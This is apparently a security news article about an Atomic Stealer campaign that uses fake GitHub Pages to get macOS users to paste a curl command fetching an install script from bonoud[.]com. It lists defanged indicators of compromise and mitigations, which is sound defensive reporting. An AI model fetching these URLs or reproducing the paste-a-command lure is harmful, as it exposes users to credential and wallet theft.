Security teams are warning of a large-scale infostealer campaign that leverages fraudulent GitHub Pages to trick macOS users into installing malicious software.
The LastPass Threat Intelligence, Mitigation, and Escalation (TIME) team has identified numerous counterfeit repositories impersonating legitimate companies, including password managers, financial institutions, and productivity tools.
These pages rank highly in search results thanks to aggressive SEO tactics on Bing and Google, making detection by end users more difficult.
Attack Overview
Threat actors published two GitHub Pages under the username “modhopmduck476” with headlines such as “Install LastPass on MacBook” and “LastPass Premium on MacBook.”
When users clicked the supposed download links, they were redirected to a secondary site hosted at macprograms-pro[.]com.
That page instructs victims to paste a command into the macOS Terminal, which performs a cURL request to a base64-encoded URL.
When decoded, the URL points to bonoud[.]com/get3/install.sh, which in turn fetches and executes a shell script to install what appears to be an update payload.
The shell script delivers the Atomic Stealer malware (also known as AMOS) by downloading the payload into the macOS temporary directory.
Atomic Stealer has been active since at least April 2023 and is commonly used by financially motivated cybercrime groups to harvest credentials, browser data, and cryptocurrency wallets.
The malware’s persistence mechanisms and exfiltration routines remain under investigation, but early analysis indicates the stealer is capable of evading basic endpoint security controls.
Security analysts link this campaign to similar macOS malware distribution efforts documented by researchers such as Dhiraj Mishra, who highlighted parallel tactics in recent Medium posts.
To evade takedown efforts, the threat actors have created multiple GitHub usernames and repositories with near-identical naming conventions.
When two fraudulent LastPass pages were reported, GitHub removed them promptly, but nearly identical clones reappeared under different accounts.
The quick rotation of repository names and user profiles has enabled the campaign to maintain high visibility in search engine results.
Indicators of Compromise and Mitigation
Security teams should monitor for any execution of the following URLs or commands in macOS environments: hxxps://ahoastock825[.]github[.]io/.github/lastpass, macprograms-pro[.]com/mac-git-2-download.html, bonoud[.]com/get3/install.sh, and bonoud[.]com/get3/update.
Additional fraudulent repositories impersonating dozens of companies—from 1Password to Robinhood listed in the campaign’s Indicators of Compromise (IoCs) at the end of LastPass’s advisory.
Administrators are advised to audit web proxy logs for requests to these domains and block them at the perimeter.
LastPass continues to monitor the campaign, working with GitHub and search engine providers to disrupt SEO-driven malicious referrals.
Users should only install macOS applications from verified sources, enable Gatekeeper protections, and employ endpoint detection solutions capable of flagging unusual shell script executions.
Updating macOS to the latest version and performing regular threat intelligence checks against known IoCs will further reduce exposure to this evolving stealer distribution campaign.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates
%20(1).webp?resize=1600,900&ssl=1&description=These pages rank highly in search results thanks to aggressive SEO tactics on Bing and Google, making detection by end users more difficult.){kind=link}